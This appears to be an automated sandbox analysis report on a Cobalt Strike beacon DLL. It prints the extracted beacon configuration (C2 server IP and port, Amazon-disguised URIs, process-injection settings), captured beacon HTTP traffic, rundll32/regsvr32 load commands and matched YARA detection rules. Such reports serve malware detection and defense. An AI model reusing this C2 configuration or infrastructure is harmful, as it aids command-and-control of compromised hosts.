Source: 8082-x64.dll.dll |
ReversingLabs: Detection: 78% |
Source: 8082-x64.dll.dll |
Virustotal: Detection: 63% |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp |
Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 8082, "SleepTime": 38500, "MaxGetSize": 1399607, "Jitter": 27, "C2Server": "20.104.209.69,/broadcast", "HttpPostUri": "/1/events/com.amazon.csm.csa.prod", "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"], "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 1670873463, "bStageCleanup": "True", "bCFGCaution": "True", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 16700, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "False", "HostHeader": ""} |
Source: Malware configuration extractor |
URLs: 20.104.209.69 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49701 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49701 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 8082 |
Source: unknown |
Network traffic detected: HTTP traffic on port 8082 -> 49709 |
Source: global traffic |
HTTP traffic detected: GET /broadcast HTTP/1.1Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Origin: https://www.amazon.comReferer: https://www.amazon.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-siteTe: trailersx-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MzM0ODIwMjEyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14587Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
TCP traffic: 192.168.2.5:49699 -> 20.104.209.69:8082 |
Source: Joe Sandbox View |
ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS |
Source: Joe Sandbox View |
IP Address: 20.104.209.69 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.104.209.69 |
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod |
Source: loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast |
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast(( |
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast2 |
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcast? |
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://20.104.209.69:8082/broadcastp |
Source: loaddll64.exe, 00000000.00000002.579668975.0000026760402000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579895773.00000267605C1000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579889103.0000026760597000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8 |
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.amazon.com |
Source: unknown |
HTTP traffic detected: POST /1/events/com.amazon.csm.csa.prod HTTP/1.1Accept: */*Origin: https://www.amazon.comx-amz-rid: MzM0ODIwMjEyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 20.104.209.69:8082Content-Length: 14587Connection: Keep-AliveCache-Control: no-cache |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Rule for beacon reflective loader Author: unknown |
Source: 8082-x64.dll.dll, type: SAMPLE |
Matched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44 |
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9 |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13 |
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13 |
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62 |
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Source: 8082-x64.dll.dll |
Static PE information: Number of sections : 11 > 10 |
Source: 8082-x64.dll.dll |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll64.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
Source: unknown |
Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\8082-x64.dll.dll" |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1 |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllGetClassObject |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllMain |
|
Source: C:\Windows\System32\loaddll64.exe |
Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll64.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01 |
Source: classification engine |
Classification label: mal100.troj.winDLL@14/0@0/1 |
Source: 8082-x64.dll.dll |
Static PE information: Image base 0x6bac0000 > 0x60000000 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760595E1A push ecx; ret 0_3_0000026760595E2D |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760596786 push ebx; ret 0_3_0000026760596794 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760596726 push ebx; ret 0_3_0000026760596794 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760595795 push eax; ret 0_3_00000267605957A4 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605957C3 push eax; ret 0_3_00000267605957A4 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605978FA push ecx; ret 0_3_0000026760597918 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594167 push esi; ret 0_3_000002676059416C |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_000002676059625F push ebp; ret 0_3_0000026760596263 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605972C8 push ebx; ret 0_3_00000267605972E8 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594AC9 push esp; ret 0_3_0000026760594AD2 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760595AEF push edx; ret 0_3_0000026760595AB8 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_00000267605972EB push esp; ret 0_3_000002676059731C |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594C00 push esi; ret 0_3_0000026760594C09 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760594480 push edx; ret 0_3_0000026760594498 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760598469 push es; ret 0_3_0000026760598470 |
Source: C:\Windows\System32\loaddll64.exe |
Code function: 0_3_0000026760598498 push ebp; ret 0_3_000002676059849F |
Source: 8082-x64.dll.dll |
Static PE information: section name: .xdata |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\loaddll64.exe TID: 3724 |
Thread sleep time: -120000s >= -30000s |
Source: C:\Windows\System32\loaddll64.exe TID: 5220 |
Thread sleep time: -32461s >= -30000s |
Source: C:\Windows\System32\loaddll64.exe TID: 5220 |
Thread sleep time: -37737s >= -30000s |
Source: C:\Windows\System32\loaddll64.exe TID: 5220 |
Thread sleep time: -34501s >= -30000s |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\loaddll64.exe |
Process information queried: ProcessInformation |
Source: C:\Windows\System32\loaddll64.exe |
Thread delayed: delay time: 120000 |
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWDO=: |
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\loaddll64.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: Yara match |
File source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR |
Source: Yara match |
File source: 8082-x64.dll.dll, type: SAMPLE |